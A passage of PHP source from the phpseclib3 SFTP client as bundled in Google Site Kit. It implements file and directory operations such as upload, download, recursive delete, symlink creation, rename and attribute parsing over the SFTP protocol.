NET_SFTP_TYPE_UNKNOWN, \substr($attr, 4)) : $attr; $this->send_sftp_packet(NET_SFTP_SETSTAT, $packet); /* "Because some systems must use separate system calls to set various attributes, it is possible that a failure response will be returned, but yet some of the attributes may be have been successfully modified. If possible, servers SHOULD avoid this situation; however, clients MUST be aware that this is possible." -- http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.6 */ $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($status) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); return \false; } return \true; } /** * Recursively sets information on directories on the SFTP server * * Minimizes directory lookups and SSH_FXP_STATUS requests for speed. * * @param string $path * @param string $attr * @param int $i * @return bool */ private function setstat_recursive($path, $attr, &$i) { if (!$this->read_put_responses($i)) { return \false; } $i = 0; $entries = $this->readlist($path, \true); if ($entries === \false || \is_int($entries)) { return $this->setstat($path, $attr, \false); } // normally $entries would have at least . and .. but it might not if the directories // permissions didn't allow reading if (empty($entries)) { return \false; } unset($entries['.'], $entries['..']); foreach ($entries as $filename => $props) { if (!isset($props['type'])) { return \false; } $temp = $path . '/' . $filename; if ($props['type'] == NET_SFTP_TYPE_DIRECTORY) { if (!$this->setstat_recursive($temp, $attr, $i)) { return \false; } } else { $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $temp); $packet .= $this->version >= 4 ? \pack('Ca*', NET_SFTP_TYPE_UNKNOWN, $attr) : $attr; $this->send_sftp_packet(NET_SFTP_SETSTAT, $packet); $i++; if ($i >= NET_SFTP_QUEUE_SIZE) { if (!$this->read_put_responses($i)) { return \false; } $i = 0; } } } $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $path); $packet .= $this->version >= 4 ? \pack('Ca*', NET_SFTP_TYPE_UNKNOWN, $attr) : $attr; $this->send_sftp_packet(NET_SFTP_SETSTAT, $packet); $i++; if ($i >= NET_SFTP_QUEUE_SIZE) { if (!$this->read_put_responses($i)) { return \false; } $i = 0; } return \true; } /** * Return the target of a symbolic link * * @param string $link * @throws \UnexpectedValueException on receipt of unexpected packets * @return mixed */ public function readlink($link) { if (!$this->precheck()) { return \false; } $link = $this->realpath($link); $this->send_sftp_packet(NET_SFTP_READLINK, \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $link)); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_NAME: break; case NET_SFTP_STATUS: $this->logError($response); return \false; default: throw new \UnexpectedValueException('Expected NET_SFTP_NAME or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($count) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); // the file isn't a symlink if (!$count) { return \false; } list($filename) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $response); return $filename; } /** * Create a symlink * * symlink() creates a symbolic link to the existing target with the specified name link. * * @param string $target * @param string $link * @throws \UnexpectedValueException on receipt of unexpected packets * @return bool */ public function symlink($target, $link) { if (!$this->precheck()) { return \false; } //$target = $this->realpath($target); $link = $this->realpath($link); /* quoting https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-09#section-12.1 : Changed the SYMLINK packet to be LINK and give it the ability to create hard links. Also change it's packet number because many implementation implemented SYMLINK with the arguments reversed. Hopefully the new argument names make it clear which way is which. */ if ($this->version == 6) { $type = NET_SFTP_LINK; $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ssC', $link, $target, 1); } else { $type = NET_SFTP_SYMLINK; /* quoting http://bxr.su/OpenBSD/usr.bin/ssh/PROTOCOL#347 : 3.1. sftp: Reversal of arguments to SSH_FXP_SYMLINK When OpenSSH's sftp-server was implemented, the order of the arguments to the SSH_FXP_SYMLINK method was inadvertently reversed. Unfortunately, the reversal was not noticed until the server was widely deployed. Since fixing this to follow the specification would cause incompatibility, the current order was retained. For correct operation, clients should send SSH_FXP_SYMLINK as follows: uint32 id string targetpath string linkpath */ $packet = \substr($this->server_identifier, 0, 15) == 'SSH-2.0-OpenSSH' ? \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ss', $target, $link) : \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ss', $link, $target); } $this->send_sftp_packet($type, $packet); $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($status) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); return \false; } return \true; } /** * Creates a directory. * * @param string $dir * @param int $mode * @param bool $recursive * @return bool */ public function mkdir($dir, $mode = -1, $recursive = \false) { if (!$this->precheck()) { return \false; } $dir = $this->realpath($dir); if ($recursive) { $dirs = \explode('/', \preg_replace('#/(?=/)|/$#', '', $dir)); if (empty($dirs[0])) { \array_shift($dirs); $dirs[0] = '/' . $dirs[0]; } for ($i = 0; $i < \count($dirs); $i++) { $temp = \array_slice($dirs, 0, $i + 1); $temp = \implode('/', $temp); $result = $this->mkdir_helper($temp, $mode); } return $result; } return $this->mkdir_helper($dir, $mode); } /** * Helper function for directory creation * * @param string $dir * @param int $mode * @return bool */ private function mkdir_helper($dir, $mode) { // send SSH_FXP_MKDIR without any attributes (that's what the \0\0\0\0 is doing) $this->send_sftp_packet(NET_SFTP_MKDIR, \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $dir) . "\x00\x00\x00\x00"); $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($status) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); return \false; } if ($mode !== -1) { $this->chmod($mode, $dir); } return \true; } /** * Removes a directory. * * @param string $dir * @throws \UnexpectedValueException on receipt of unexpected packets * @return bool */ public function rmdir($dir) { if (!$this->precheck()) { return \false; } $dir = $this->realpath($dir); if ($dir === \false) { return \false; } $this->send_sftp_packet(NET_SFTP_RMDIR, \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $dir)); $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($status) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { // presumably SSH_FX_NO_SUCH_FILE or SSH_FX_PERMISSION_DENIED? $this->logError($response, $status); return \false; } $this->remove_from_stat_cache($dir); // the following will do a soft delete, which would be useful if you deleted a file // and then tried to do a stat on the deleted file. the above, in contrast, does // a hard delete //$this->update_stat_cache($dir, false); return \true; } /** * Uploads a file to the SFTP server. * * By default, \phpseclib3\Net\SFTP::put() does not read from the local filesystem. $data is dumped directly into $remote_file. * So, for example, if you set $data to 'filename.ext' and then do \phpseclib3\Net\SFTP::get(), you will get a file, twelve bytes * long, containing 'filename.ext' as its contents. * * Setting $mode to self::SOURCE_LOCAL_FILE will change the above behavior. With self::SOURCE_LOCAL_FILE, $remote_file will * contain as many bytes as filename.ext does on your local filesystem. If your filename.ext is 1MB then that is how * large $remote_file will be, as well. * * Setting $mode to self::SOURCE_CALLBACK will use $data as callback function, which gets only one parameter -- number * of bytes to return, and returns a string if there is some data or null if there is no more data * * If $data is a resource then it'll be used as a resource instead. * * Currently, only binary mode is supported. As such, if the line endings need to be adjusted, you will need to take * care of that, yourself. * * $mode can take an additional two parameters - self::RESUME and self::RESUME_START. These are bitwise AND'd with * $mode. So if you want to resume upload of a 300mb file on the local file system you'd set $mode to the following: * * self::SOURCE_LOCAL_FILE | self::RESUME * * If you wanted to simply append the full contents of a local file to the full contents of a remote file you'd replace * self::RESUME with self::RESUME_START. * * If $mode & (self::RESUME | self::RESUME_START) then self::RESUME_START will be assumed. * * $start and $local_start give you more fine grained control over this process and take precident over self::RESUME * when they're non-negative. ie. $start could let you write at the end of a file (like self::RESUME) or in the middle * of one. $local_start could let you start your reading from the end of a file (like self::RESUME_START) or in the * middle of one. * * Setting $local_start to > 0 or $mode | self::RESUME_START doesn't do anything unless $mode | self::SOURCE_LOCAL_FILE. * * {@internal ASCII mode for SFTPv4/5/6 can be supported by adding a new function - \phpseclib3\Net\SFTP::setMode().} * * @param string $remote_file * @param string|resource $data * @param int $mode * @param int $start * @param int $local_start * @param callable|null $progressCallback * @throws \UnexpectedValueException on receipt of unexpected packets * @throws \BadFunctionCallException if you're uploading via a callback and the callback function is invalid * @throws FileNotFoundException if you're uploading via a file and the file doesn't exist * @return bool */ public function put($remote_file, $data, $mode = self::SOURCE_STRING, $start = -1, $local_start = -1, $progressCallback = null) { if (!$this->precheck()) { return \false; } $remote_file = $this->realpath($remote_file); if ($remote_file === \false) { return \false; } $this->remove_from_stat_cache($remote_file); if ($this->version >= 5) { $flags = NET_SFTP_OPEN_OPEN_OR_CREATE; } else { $flags = NET_SFTP_OPEN_WRITE | NET_SFTP_OPEN_CREATE; // according to the SFTP specs, NET_SFTP_OPEN_APPEND should "force all writes to append data at the end of the file." // in practice, it doesn't seem to do that. //$flags|= ($mode & self::RESUME) ? NET_SFTP_OPEN_APPEND : NET_SFTP_OPEN_TRUNCATE; } if ($start >= 0) { $offset = $start; } elseif ($mode & (self::RESUME | self::RESUME_START)) { // if NET_SFTP_OPEN_APPEND worked as it should _size() wouldn't need to be called $stat = $this->stat($remote_file); $offset = $stat !== \false && $stat['size'] ? $stat['size'] : 0; } else { $offset = 0; if ($this->version >= 5) { $flags = NET_SFTP_OPEN_CREATE_TRUNCATE; } else { $flags |= NET_SFTP_OPEN_TRUNCATE; } } $this->remove_from_stat_cache($remote_file); $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $remote_file); $packet .= $this->version >= 5 ? \pack('N3', 0, $flags, 0) : \pack('N2', $flags, 0); $this->send_sftp_packet(NET_SFTP_OPEN, $packet); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_HANDLE: $handle = \substr($response, 4); break; case NET_SFTP_STATUS: $this->logError($response); return \false; default: throw new \UnexpectedValueException('Expected NET_SFTP_HANDLE or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.2.3 $dataCallback = \false; switch (\true) { case $mode & self::SOURCE_CALLBACK: if (!\is_callable($data)) { throw new \BadFunctionCallException("\$data should be is_callable() if you specify SOURCE_CALLBACK flag"); } $dataCallback = $data; // do nothing break; case \is_resource($data): $mode = $mode & ~self::SOURCE_LOCAL_FILE; $info = \stream_get_meta_data($data); if (isset($info['wrapper_type']) && $info['wrapper_type'] == 'PHP' && $info['stream_type'] == 'Input') { $fp = \fopen('php://memory', 'w+'); \stream_copy_to_stream($data, $fp); \rewind($fp); } else { $fp = $data; } break; case $mode & self::SOURCE_LOCAL_FILE: if (!\is_file($data)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\FileNotFoundException("{$data} is not a valid file"); } $fp = @\fopen($data, 'rb'); if (!$fp) { return \false; } } if (isset($fp)) { $stat = \fstat($fp); $size = !empty($stat) ? $stat['size'] : 0; if ($local_start >= 0) { \fseek($fp, $local_start); $size -= $local_start; } elseif ($mode & self::RESUME) { \fseek($fp, $offset); $size -= $offset; } } elseif ($dataCallback) { $size = 0; } else { $size = \strlen($data); } $sent = 0; $size = $size < 0 ? ($size & 0x7fffffff) + 0x80000000 : $size; $sftp_packet_size = $this->max_sftp_packet; // make the SFTP packet be exactly the SFTP packet size by including the bytes in the NET_SFTP_WRITE packets "header" $sftp_packet_size -= \strlen($handle) + 25; $i = $j = 0; while ($dataCallback || ($size === 0 || $sent < $size)) { if ($dataCallback) { $temp = $dataCallback($sftp_packet_size); if (\is_null($temp)) { break; } } else { $temp = isset($fp) ? \fread($fp, $sftp_packet_size) : \substr($data, $sent, $sftp_packet_size); if ($temp === \false || $temp === '') { break; } } $subtemp = $offset + $sent; $packet = \pack('Na*N3a*', \strlen($handle), $handle, $subtemp / 4294967296, $subtemp, \strlen($temp), $temp); try { $this->send_sftp_packet(NET_SFTP_WRITE, $packet, $j); } catch (\Exception $e) { if ($mode & self::SOURCE_LOCAL_FILE) { \fclose($fp); } throw $e; } $sent += \strlen($temp); if (\is_callable($progressCallback)) { $progressCallback($sent); } $i++; $j++; if ($i == NET_SFTP_UPLOAD_QUEUE_SIZE) { if (!$this->read_put_responses($i)) { $i = 0; break; } $i = 0; } } $result = $this->close_handle($handle); if (!$this->read_put_responses($i)) { if ($mode & self::SOURCE_LOCAL_FILE) { \fclose($fp); } $this->close_handle($handle); return \false; } if ($mode & \Google\Site_Kit_Dependencies\phpseclib3\Net\SFTP::SOURCE_LOCAL_FILE) { if (isset($fp) && \is_resource($fp)) { \fclose($fp); } if ($this->preserveTime) { $stat = \stat($data); $attr = $this->version < 4 ? \pack('N3', NET_SFTP_ATTR_ACCESSTIME, $stat['atime'], $stat['mtime']) : \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('NQ2', NET_SFTP_ATTR_ACCESSTIME | NET_SFTP_ATTR_MODIFYTIME, $stat['atime'], $stat['mtime']); if (!$this->setstat($remote_file, $attr, \false)) { throw new \RuntimeException('Error setting file time'); } } } return $result; } /** * Reads multiple successive SSH_FXP_WRITE responses * * Sending an SSH_FXP_WRITE packet and immediately reading its response isn't as efficient as blindly sending out $i * SSH_FXP_WRITEs, in succession, and then reading $i responses. * * @param int $i * @return bool * @throws \UnexpectedValueException on receipt of unexpected packets */ private function read_put_responses($i) { while ($i--) { $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($status) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); break; } } return $i < 0; } /** * Close handle * * @param string $handle * @return bool * @throws \UnexpectedValueException on receipt of unexpected packets */ private function close_handle($handle) { $this->send_sftp_packet(NET_SFTP_CLOSE, \pack('Na*', \strlen($handle), $handle)); // "The client MUST release all resources associated with the handle regardless of the status." // -- http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.1.3 $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($status) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); return \false; } return \true; } /** * Downloads a file from the SFTP server. * * Returns a string containing the contents of $remote_file if $local_file is left undefined or a boolean false if * the operation was unsuccessful. If $local_file is defined, returns true or false depending on the success of the * operation. * * $offset and $length can be used to download files in chunks. * * @param string $remote_file * @param string|bool|resource|callable $local_file * @param int $offset * @param int $length * @param callable|null $progressCallback * @throws \UnexpectedValueException on receipt of unexpected packets * @return string|bool */ public function get($remote_file, $local_file = \false, $offset = 0, $length = -1, $progressCallback = null) { if (!$this->precheck()) { return \false; } $remote_file = $this->realpath($remote_file); if ($remote_file === \false) { return \false; } $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $remote_file); $packet .= $this->version >= 5 ? \pack('N3', 0, NET_SFTP_OPEN_OPEN_EXISTING, 0) : \pack('N2', NET_SFTP_OPEN_READ, 0); $this->send_sftp_packet(NET_SFTP_OPEN, $packet); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_HANDLE: $handle = \substr($response, 4); break; case NET_SFTP_STATUS: // presumably SSH_FX_NO_SUCH_FILE or SSH_FX_PERMISSION_DENIED $this->logError($response); return \false; default: throw new \UnexpectedValueException('Expected NET_SFTP_HANDLE or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } if (\is_resource($local_file)) { $fp = $local_file; $stat = \fstat($fp); $res_offset = $stat['size']; } else { $res_offset = 0; if ($local_file !== \false && !\is_callable($local_file)) { $fp = \fopen($local_file, 'wb'); if (!$fp) { return \false; } } else { $content = ''; } } $fclose_check = $local_file !== \false && !\is_callable($local_file) && !\is_resource($local_file); $start = $offset; $read = 0; while (\true) { $i = 0; while ($i < NET_SFTP_QUEUE_SIZE && ($length < 0 || $read < $length)) { $tempoffset = $start + $read; $packet_size = $length > 0 ? \min($this->max_sftp_packet, $length - $read) : $this->max_sftp_packet; $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('sN3', $handle, $tempoffset / 4294967296, $tempoffset, $packet_size); try { $this->send_sftp_packet(NET_SFTP_READ, $packet, $i); } catch (\Exception $e) { if ($fclose_check) { \fclose($fp); } throw $e; } $packet = null; $read += $packet_size; $i++; } if (!$i) { break; } $packets_sent = $i - 1; $clear_responses = \false; while ($i > 0) { $i--; if ($clear_responses) { $this->get_sftp_packet($packets_sent - $i); continue; } else { $response = $this->get_sftp_packet($packets_sent - $i); } switch ($this->packet_type) { case NET_SFTP_DATA: $temp = \substr($response, 4); $offset += \strlen($temp); if ($local_file === \false) { $content .= $temp; } elseif (\is_callable($local_file)) { $local_file($temp); } else { \fputs($fp, $temp); } if (\is_callable($progressCallback)) { \call_user_func($progressCallback, $offset); } $temp = null; break; case NET_SFTP_STATUS: // could, in theory, return false if !strlen($content) but we'll hold off for the time being $this->logError($response); $clear_responses = \true; // don't break out of the loop yet, so we can read the remaining responses break; default: if ($fclose_check) { \fclose($fp); } if ($this->channel_close) { $this->partial_init = \false; $this->init_sftp_connection(); return \false; } else { throw new \UnexpectedValueException('Expected NET_SFTP_DATA or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } } $response = null; } if ($clear_responses) { break; } } if ($fclose_check) { \fclose($fp); if ($this->preserveTime) { $stat = $this->stat($remote_file); \touch($local_file, $stat['mtime'], $stat['atime']); } } if (!$this->close_handle($handle)) { return \false; } // if $content isn't set that means a file was written to return isset($content) ? $content : \true; } /** * Deletes a file on the SFTP server. * * @param string $path * @param bool $recursive * @return bool * @throws \UnexpectedValueException on receipt of unexpected packets */ public function delete($path, $recursive = \true) { if (!$this->precheck()) { return \false; } if (\is_object($path)) { // It's an object. Cast it as string before we check anything else. $path = (string) $path; } if (!\is_string($path) || $path == '') { return \false; } $path = $this->realpath($path); if ($path === \false) { return \false; } // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.3 $this->send_sftp_packet(NET_SFTP_REMOVE, \pack('Na*', \strlen($path), $path)); $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } // if $status isn't SSH_FX_OK it's probably SSH_FX_NO_SUCH_FILE or SSH_FX_PERMISSION_DENIED list($status) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); if (!$recursive) { return \false; } $i = 0; $result = $this->delete_recursive($path, $i); $this->read_put_responses($i); return $result; } $this->remove_from_stat_cache($path); return \true; } /** * Recursively deletes directories on the SFTP server * * Minimizes directory lookups and SSH_FXP_STATUS requests for speed. * * @param string $path * @param int $i * @return bool */ private function delete_recursive($path, &$i) { if (!$this->read_put_responses($i)) { return \false; } $i = 0; $entries = $this->readlist($path, \true); // The folder does not exist at all, so we cannot delete it. if ($entries === NET_SFTP_STATUS_NO_SUCH_FILE) { return \false; } // Normally $entries would have at least . and .. but it might not if the directories // permissions didn't allow reading. If this happens then default to an empty list of files. if ($entries === \false || \is_int($entries)) { $entries = []; } unset($entries['.'], $entries['..']); foreach ($entries as $filename => $props) { if (!isset($props['type'])) { return \false; } $temp = $path . '/' . $filename; if ($props['type'] == NET_SFTP_TYPE_DIRECTORY) { if (!$this->delete_recursive($temp, $i)) { return \false; } } else { $this->send_sftp_packet(NET_SFTP_REMOVE, \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $temp)); $this->remove_from_stat_cache($temp); $i++; if ($i >= NET_SFTP_QUEUE_SIZE) { if (!$this->read_put_responses($i)) { return \false; } $i = 0; } } } $this->send_sftp_packet(NET_SFTP_RMDIR, \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $path)); $this->remove_from_stat_cache($path); $i++; if ($i >= NET_SFTP_QUEUE_SIZE) { if (!$this->read_put_responses($i)) { return \false; } $i = 0; } return \true; } /** * Checks whether a file or directory exists * * @param string $path * @return bool */ public function file_exists($path) { if ($this->use_stat_cache) { if (!$this->precheck()) { return \false; } $path = $this->realpath($path); $result = $this->query_stat_cache($path); if (isset($result)) { // return true if $result is an array or if it's an stdClass object return $result !== \false; } } return $this->stat($path) !== \false; } /** * Tells whether the filename is a directory * * @param string $path * @return bool */ public function is_dir($path) { $result = $this->get_stat_cache_prop($path, 'type'); if ($result === \false) { return \false; } return $result === NET_SFTP_TYPE_DIRECTORY; } /** * Tells whether the filename is a regular file * * @param string $path * @return bool */ public function is_file($path) { $result = $this->get_stat_cache_prop($path, 'type'); if ($result === \false) { return \false; } return $result === NET_SFTP_TYPE_REGULAR; } /** * Tells whether the filename is a symbolic link * * @param string $path * @return bool */ public function is_link($path) { $result = $this->get_lstat_cache_prop($path, 'type'); if ($result === \false) { return \false; } return $result === NET_SFTP_TYPE_SYMLINK; } /** * Tells whether a file exists and is readable * * @param string $path * @return bool */ public function is_readable($path) { if (!$this->precheck()) { return \false; } $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('sNN', $this->realpath($path), NET_SFTP_OPEN_READ, 0); $this->send_sftp_packet(NET_SFTP_OPEN, $packet); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_HANDLE: return \true; case NET_SFTP_STATUS: // presumably SSH_FX_NO_SUCH_FILE or SSH_FX_PERMISSION_DENIED return \false; default: throw new \UnexpectedValueException('Expected NET_SFTP_HANDLE or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } } /** * Tells whether the filename is writable * * @param string $path * @return bool */ public function is_writable($path) { if (!$this->precheck()) { return \false; } $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('sNN', $this->realpath($path), NET_SFTP_OPEN_WRITE, 0); $this->send_sftp_packet(NET_SFTP_OPEN, $packet); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_HANDLE: return \true; case NET_SFTP_STATUS: // presumably SSH_FX_NO_SUCH_FILE or SSH_FX_PERMISSION_DENIED return \false; default: throw new \UnexpectedValueException('Expected SSH_FXP_HANDLE or SSH_FXP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } } /** * Tells whether the filename is writeable * * Alias of is_writable * * @param string $path * @return bool */ public function is_writeable($path) { return $this->is_writable($path); } /** * Gets last access time of file * * @param string $path * @return mixed */ public function fileatime($path) { return $this->get_stat_cache_prop($path, 'atime'); } /** * Gets file modification time * * @param string $path * @return mixed */ public function filemtime($path) { return $this->get_stat_cache_prop($path, 'mtime'); } /** * Gets file permissions * * @param string $path * @return mixed */ public function fileperms($path) { return $this->get_stat_cache_prop($path, 'mode'); } /** * Gets file owner * * @param string $path * @return mixed */ public function fileowner($path) { return $this->get_stat_cache_prop($path, 'uid'); } /** * Gets file group * * @param string $path * @return mixed */ public function filegroup($path) { return $this->get_stat_cache_prop($path, 'gid'); } /** * Recursively go through rawlist() output to get the total filesize * * @return int */ private static function recursiveFilesize(array $files) { $size = 0; foreach ($files as $name => $file) { if ($name == '.' || $name == '..') { continue; } $size += \is_array($file) ? self::recursiveFilesize($file) : $file->size; } return $size; } /** * Gets file size * * @param string $path * @param bool $recursive * @return mixed */ public function filesize($path, $recursive = \false) { return !$recursive || $this->filetype($path) != 'dir' ? $this->get_stat_cache_prop($path, 'size') : self::recursiveFilesize($this->rawlist($path, \true)); } /** * Gets file type * * @param string $path * @return string|false */ public function filetype($path) { $type = $this->get_stat_cache_prop($path, 'type'); if ($type === \false) { return \false; } switch ($type) { case NET_SFTP_TYPE_BLOCK_DEVICE: return 'block'; case NET_SFTP_TYPE_CHAR_DEVICE: return 'char'; case NET_SFTP_TYPE_DIRECTORY: return 'dir'; case NET_SFTP_TYPE_FIFO: return 'fifo'; case NET_SFTP_TYPE_REGULAR: return 'file'; case NET_SFTP_TYPE_SYMLINK: return 'link'; default: return \false; } } /** * Return a stat properity * * Uses cache if appropriate. * * @param string $path * @param string $prop * @return mixed */ private function get_stat_cache_prop($path, $prop) { return $this->get_xstat_cache_prop($path, $prop, 'stat'); } /** * Return an lstat properity * * Uses cache if appropriate. * * @param string $path * @param string $prop * @return mixed */ private function get_lstat_cache_prop($path, $prop) { return $this->get_xstat_cache_prop($path, $prop, 'lstat'); } /** * Return a stat or lstat properity * * Uses cache if appropriate. * * @param string $path * @param string $prop * @param string $type * @return mixed */ private function get_xstat_cache_prop($path, $prop, $type) { if (!$this->precheck()) { return \false; } if ($this->use_stat_cache) { $path = $this->realpath($path); $result = $this->query_stat_cache($path); if (\is_object($result) && isset($result->{$type})) { return $result->{$type}[$prop]; } } $result = $this->{$type}($path); if ($result === \false || !isset($result[$prop])) { return \false; } return $result[$prop]; } /** * Renames a file or a directory on the SFTP server. * * If the file already exists this will return false * * @param string $oldname * @param string $newname * @return bool * @throws \UnexpectedValueException on receipt of unexpected packets */ public function rename($oldname, $newname) { if (!$this->precheck()) { return \false; } $oldname = $this->realpath($oldname); $newname = $this->realpath($newname); if ($oldname === \false || $newname === \false) { return \false; } // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.3 $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ss', $oldname, $newname); if ($this->version >= 5) { /* quoting https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-05#section-6.5 , 'flags' is 0 or a combination of: SSH_FXP_RENAME_OVERWRITE 0x00000001 SSH_FXP_RENAME_ATOMIC 0x00000002 SSH_FXP_RENAME_NATIVE 0x00000004 (none of these are currently supported) */ $packet .= "\x00\x00\x00\x00"; } $this->send_sftp_packet(NET_SFTP_RENAME, $packet); $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } // if $status isn't SSH_FX_OK it's probably SSH_FX_NO_SUCH_FILE or SSH_FX_PERMISSION_DENIED list($status) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); return \false; } // don't move the stat cache entry over since this operation could very well change the // atime and mtime attributes //$this->update_stat_cache($newname, $this->query_stat_cache($oldname)); $this->remove_from_stat_cache($oldname); $this->remove_from_stat_cache($newname); return \true; } /** * Parse Time * * See '7.7. Times' of draft-ietf-secsh-filexfer-13 for more info. * * @param string $key * @param int $flags * @param string $response * @return array */ private function parseTime($key, $flags, &$response) { $attr = []; list($attr[$key]) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('Q', $response); if ($flags & NET_SFTP_ATTR_SUBSECOND_TIMES) { list($attr[$key . '-nseconds']) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); } return $attr; } /** * Parse Attributes * * See '7. File Attributes' of draft-ietf-secsh-filexfer-13 for more info. * * @param string $response * @return array */ protected function parseAttributes(&$response) { $attr = []; if ($this->version >= 4) { list($flags, $attr['type']) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('NC', $response); } else { list($flags) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); } foreach (self::$attributes as $key => $value) { switch ($flags & $key) { case NET_SFTP_ATTR_UIDGID: if ($this->version > 3) { continue 2; } break; case NET_SFTP_ATTR_CREATETIME: case NET_SFTP_ATTR_MODIFYTIME: case NET_SFTP_ATTR_ACL: case NET_SFTP_ATTR_OWNERGROUP: case NET_SFTP_ATTR_SUBSECOND_TIMES: if ($this->version < 4) { continue 2; } break; case NET_SFTP_ATTR_BITS: if ($this->version < 5) { continue 2; } break; case NET_SFTP_ATTR_ALLOCATION_SIZE: case NET_SFTP_ATTR_TEXT_HINT: case NET_SFTP_ATTR_MIME_TYPE: case NET_SFTP_ATTR_LINK_COUNT: case NET_SFTP_ATTR_UNTRANSLATED_NAME: case NET_SFTP_ATTR_CTIME: if ($this->version < 6) { continue 2; } } switch ($flags & $key) { case NET_SFTP_ATTR_SIZE: // 0x00000001 // The size attribute is defined as an unsigned 64-bit integer. // The following will use floats on 32-bit platforms, if necessary. // As can be seen in the BigInteger class, floats are generally // IEEE 754 binary64 "double precision" on such platforms and // as such can represent integers of at least 2^50 without loss // of precision. Interpreted in filesize, 